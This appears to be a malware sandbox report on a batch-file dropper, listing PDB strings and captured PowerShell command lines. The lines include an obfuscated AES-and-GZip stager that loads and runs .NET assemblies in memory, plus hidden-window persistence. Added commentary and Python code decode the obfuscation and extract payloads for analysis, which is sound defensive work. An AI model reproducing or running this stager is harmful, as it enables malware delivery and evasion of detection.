Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)
+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
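The two PowerShell command lines above use two cheap string-obfuscation tricks that defeat keyword matching but nothing else. The first (function `Local:thuUFdhjXkHq`) spells every string as a `''+[Char](82)+'e'+...` concatenation; folded, the strings read ReflectedDelegate, InMemoryModule, MyDelegateType, Class,Public,Sealed,AnsiClass,AutoClass, RTSpecialName,HideBySig,Public, Runtime,Managed, Invoke, Public,HideBySig,NewSlot,Virtual, System.dll and (cut off on this page) Microsoft.Win32.UnsafeNativeMetho, which is the Reflection.Emit delegate builder and GetProcAddress lookup used by PowerSploit's Get-DelegateType/Get-ProcAddress. The second (the stager echoed into powershell.exe) writes each `Invoke-Expression` argument with the junk token `blck` spliced into type names and strips it at runtime with `.Replace('blck', '')`. The following Python is an added example, not code from the report or from the sample, that undoes both forms; it assumes PowerShell single-quoted literals (`''` inside a literal is an escaped quote) and that the `[Char](N)` expressions are joined only by `+`.

```python
import re

# One token of the [Char](N) / 'literal' concatenation form.
_TOKEN = re.compile(r"\[Char\]\((\d+)\)|'((?:[^']|'')*)'")
# A run of two or more such tokens joined by '+', i.e. one obfuscated string.
_RUN = re.compile(
    r"(?:\[Char\]\(\d+\)|'(?:[^']|'')*')(?:\+(?:\[Char\]\(\d+\)|'(?:[^']|'')*'))+"
)


def fold_char_concat(expr: str) -> str:
    """Collapse ''+[Char](82)+'e'+... into the string PowerShell would build."""
    out = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        else:
            out.append(m.group(2).replace("''", "'"))  # '' is an escaped quote
    return "".join(out)


def deobfuscate_script(script: str) -> str:
    """Rewrite every [Char]/literal concatenation run as a single literal."""
    return _RUN.sub(
        lambda m: "'" + fold_char_concat(m.group(0)).replace("'", "''") + "'", script
    )


def find_junk_token(script: str):
    """Recover the junk token from the stager's own .Replace('<token>', '') call."""
    m = re.search(r"\.Replace\('([^']+)',\s*''\)", script)
    return m.group(1) if m else None


def strip_junk_token(s: str, token: str = "blck") -> str:
    """Mirror the stager's .Replace('blck', '')."""
    return s.replace(token, "")


def deobfuscate_junk_script(script: str) -> str:
    """Strip the junk token from a whole stager body and drop the Replace calls."""
    token = find_junk_token(script)
    if token is None:
        return script
    return re.sub(r"\.Replace\('%s',\s*''\)" % re.escape(token), "", script).replace(token, "")


if __name__ == "__main__":
    # Strings taken from the two command lines on this page.
    print(fold_char_concat("''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+''"))
    print(strip_junk_token("$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);"))
```

Run `deobfuscate_script` over the first command line and `deobfuscate_junk_script` over the second before reading them; the result is ordinary PowerShell that any reviewer can follow, and that PowerShell's own script-block logging (Event 4104) would also have recorded in decoded form.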
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
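Both copies of the stager above (the Desktop one and the one persisted as `C:\Windows\$rbx-onimai2\$rbx-CO2.bat`) download nothing: the payloads travel inside the .bat file itself, which is why the report flags a large BAT file. The stager reads its own file, takes the first line that starts with `:: ` (a cmd.exe comment, so the batch interpreter skips it), splits the remainder on `\`, and for each chunk runs base64-decode, `Rgueq` (AES-256-CBC with PKCS7 padding and the key and IV hard-coded in the script, the same IV for every blob), `qVeuI` (GZip decompress) and finally `cOeZm` (`[Reflection.Assembly]::Load` followed by `EntryPoint.Invoke`), so the output is two .NET assemblies executed in the powershell.exe process. The Python below is an added example, not part of the report or of the sample; it reproduces the decoding so the assemblies can be written to disk for static analysis instead of being run. It needs the `cryptography` package, and because the real carrier line is not reproduced on this page it builds a constructed carrier with the same key and IV for demonstration.

```python
import base64
import gzip
import hashlib
import sys

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Key (32 bytes, so AES-256) and IV (16 bytes) exactly as hard-coded in Rgueq().
AES_KEY = base64.b64decode("/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=")
AES_IV = base64.b64decode("VZVM+EzOQl4yXpCtgZwmdA==")
MARKER = ":: "  # prefix of the carrier line; '::' is a comment to cmd.exe


def rgueq(blob: bytes) -> bytes:
    """Mirror Rgueq(): AES-CBC decrypt, then strip PKCS7 padding."""
    dec = Cipher(algorithms.AES(AES_KEY), modes.CBC(AES_IV)).decryptor()
    padded = dec.update(blob) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def qveui(blob: bytes) -> bytes:
    """Mirror qVeuI(): GZipStream in Decompress mode."""
    return gzip.decompress(blob)


def extract_payloads(bat_text: str) -> list:
    """Walk the .bat exactly as the stager does and return the decoded blobs in
    the order the stager would Assembly.Load() them."""
    for line in bat_text.splitlines():
        if line.startswith(MARKER):
            carrier = line[len(MARKER):]
            break
    else:
        raise ValueError("no ':: ' carrier line found")
    return [qveui(rgueq(base64.b64decode(chunk))) for chunk in carrier.split("\\")]


def describe(payload: bytes) -> dict:
    """Static triage of one decoded blob; the stager expects a PE (.NET assembly)."""
    return {
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "is_pe": payload[:2] == b"MZ",
    }


# ---- constructed carrier for demonstration (not the real sample's content) ----
def encrypt_like_stager(plain: bytes) -> str:
    """Inverse of the stager pipeline: gzip -> PKCS7 -> AES-CBC -> base64."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(gzip.compress(plain)) + pad.finalize()
    enc = Cipher(algorithms.AES(AES_KEY), modes.CBC(AES_IV)).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode()


def build_sample_bat(payloads) -> str:
    carrier = "\\".join(encrypt_like_stager(p) for p in payloads)
    return "@echo off\r\n" + MARKER + carrier + "\r\nrem launcher lines would follow\r\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real file: python decode.py rbx-CO2.bat
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:                  # no file given: decode the constructed carrier
        text = build_sample_bat([b"MZ" + b"\0" * 62 + b"stage one", b"MZ" + b"\0" * 62 + b"stage two"])
    for i, blob in enumerate(extract_payloads(text)):
        out = "payload%d.bin" % i
        with open(out, "wb") as fh:  # written for analysis, never executed
            fh.write(blob)
        print(out, describe(blob))
```

Because key and IV are fixed and embedded, the same decoder works for every .bat produced by this builder; a changed key only requires updating the two constants, which can be read straight out of the `Rgueq` function in the file.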
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
